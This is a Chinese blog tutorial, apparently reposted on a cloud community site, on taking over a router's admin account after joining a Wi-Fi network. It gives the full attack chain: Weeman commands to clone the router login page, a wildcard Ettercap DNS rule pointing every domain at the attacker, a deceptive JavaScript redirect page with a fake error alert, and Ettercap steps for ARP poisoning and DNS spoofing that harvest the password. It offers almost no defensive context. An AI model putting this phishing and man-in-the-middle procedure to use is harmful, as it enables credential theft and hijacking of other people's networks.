[技巧]看我如何通过Weeman+Ettercap拿下路由器管理权限

本文作者:sn0w

原文链接:https://zhuanlan.zhihu.com/p/20871363

本篇文章主要介绍如何在接入无线网络后如何拿到路由器的管理权限,至于如何得到路由器连接密码可以参考 WPA-PSK无线网络的破解 ,本文只提供一个思路。

我们大致的思路是通过weeman伪造登录页面,ettercap进行arp欺骗DNS劫持,从而让管理员跳转到我们的钓鱼页面,欺骗输入管理密码。

测试环境:

攻击者: 192.168.0.101 kali linux 2016.1

目标管理员: 192.168.0.100 Windows 10

路由器管理地址: 192.168.0.1

首先我们需要生成一个伪造的登录页面,需要用到的工具为Weeman,关于这个的工具的介绍并不多,大家可以参考简单易用的钓鱼渗透测试工具Weeman新版发布。

1.设置伪造的目标地址:

set url http://192.168.0.1/login.asp

2.设置端口号:

set port 8080

3.设置转跳地址(登录成功后的页面):

set action_url http://192.168.0.1/index.asp

通过简单的配置就可以运行了

run

可以看到他已经Download了目标地址并放在了8080端口下,此时他会在在程序的根目录下生成一个index.html文件,但是我们访问后发现效果并不是很好。

其实这个脚本只是单纯的将HTML代码进行了缓存,并没有对支持网页的一些资源(CSS/JavaScript/图片)进行缓存。为了让我们的钓鱼页面更具有欺骗效果,我们对他进行一些简单的优化,首先我们打开正常的登录页面 Ctrl + S 将整站进行保存

我们将下载的文件放在与index.html同目录(weeman根目录)下。注:此处我们可以还需要改一下index.html引入的路径。

最终效果(时间原因并没有加上所有图片):

至此,我们第一步已经完成下面我们要上利器ettercap,在这之前我们先做一下简单配置。

首先我们需要配置一下DNS文件,在etc/ettercap/etter.dns 内添加一行

*     A     192.168.0.101

* 为通配符,这一行的意思为将所有的网站全部解析到192.168.0.101(攻击者IP)。

然后我们开启apache服务,让攻击者的电脑成为一个web服务器

service apache2 start 

现在我们去做一个简单的转跳页面放在apache的www目录(var/www/html)下,通过这个转跳页面转到我们的钓鱼页面,当然这个转跳页面也要具有一定的欺骗性。

http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
    <script type="text/javascript">
      alert("网络连接失败,请尝试重新配置路由器!");
      location.href='http://192.168.0.101:8080';     <!--钓鱼界面-->
    </script>
  </head>
  <body>

  </body>
</html>

这段代码可以实现,再打开这个后弹窗 “网络连接失败,请尝试重新配置路由器!”,然后转调至我们的钓鱼页面。

下面我们打开ettercap进行dns欺骗

依次选择Sniff -> Uuified Sniffing选择网卡

Hosts->Scan for hosts 扫描在线主机

Hosts -> Hosts list 列出在线主机列表

选中 192.168.0.1 -> add to target 1 然后 192.168.0.100 -> add to target 2

Mitm -> Arp Poisoning 将第一项打勾 开启ARP欺骗

Plugins -> Manager the plugins 双击打开dns_spoof模块启动DNS劫持。

最后Start -> Start Sniffing 开启ARP欺骗+DNS劫持。

我们在目标主机ping常用网站 发现解析地址已经转到攻击者IP

我们模拟管理员正常上网,打开一些常用网站

已经成功解析到攻击者IP ,我们点击确定后转跳到钓鱼页面(忽视这个不完美的钓鱼页面)。

输入管理密码,正常登陆

发布

此时,我们后台的Weeman已经成功劫持到密码。

文章仅供参考,技术渣有问题欢迎指出。

本文分享自微信公众号 - 玄魂工作室(xuanhun521)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2016-11-29

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏钱塘大数据

中国互联网协会发布:《2018中国互联网发展报告》

在2018中国互联网大会闭幕论坛上,中国互联网协会正式发布《中国互联网发展报告2018》(以下简称《报告》)。《中国互联网发展报告》是由中国互联网协会与中国互联...

13250
来自专栏Ken的杂谈

【系统设置】CentOS 修改机器名

17730
来自专栏微信公众号:小白课代表

不只是软件,在线也可以免费下载百度文库了。

不管是学生,还是职场员工,下载各种文档几乎是不可避免的,各种XXX.docx,XXX.pptx更是家常便饭,人们最常用的就是百度文库,豆丁文库,道客巴巴这些下载...

43530
来自专栏前端桃园

知识体系解决迷茫的你

最近在星球里群里都有小伙伴说道自己对未来的路比较迷茫,一旦闲下来就不知道自己改干啥,今天我这篇文章就是让你觉得一天给你 25 个小时你都不够用,觉得睡觉都是浪费...

20040
来自专栏腾讯高校合作

【倒计时7天】2018教育部-腾讯公司产学合作协同育人项目申请即将截止!

15420
来自专栏怀英的自我修炼

考研英语-1-导学

英二图表作文要重视。总体而言,英语一会比英语二难点。不过就写作而言,英语二会比英语一有难度,毕竟图表作文并不好写。

11410
来自专栏FSociety

SQL中GROUP BY用法示例

GROUP BY我们可以先从字面上来理解,GROUP表示分组,BY后面写字段名,就表示根据哪个字段进行分组,如果有用Excel比较多的话,GROUP BY比较类...

5.1K20
来自专栏haifeiWu与他朋友们的专栏

复杂业务下向Mysql导入30万条数据代码优化的踩坑记录

从毕业到现在第一次接触到超过30万条数据导入MySQL的场景(有点low),就是在顺丰公司接入我司EMM产品时需要将AD中的员工数据导入MySQL中,因此楼主负...

27240
来自专栏腾讯社交用户体验设计

ISUX Xcube智能一键生成H5

50920
来自专栏钱塘大数据

理工男图解零维到十维空间,烧脑已过度,受不了啦!

让我们从一个点开始,和我们几何意义上的点一样,它没有大小、没有维度。它只是被想象出来的、作为标志一个位置的点。它什么也没有,空间、时间通通不存在,这就是零维度。

27830

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励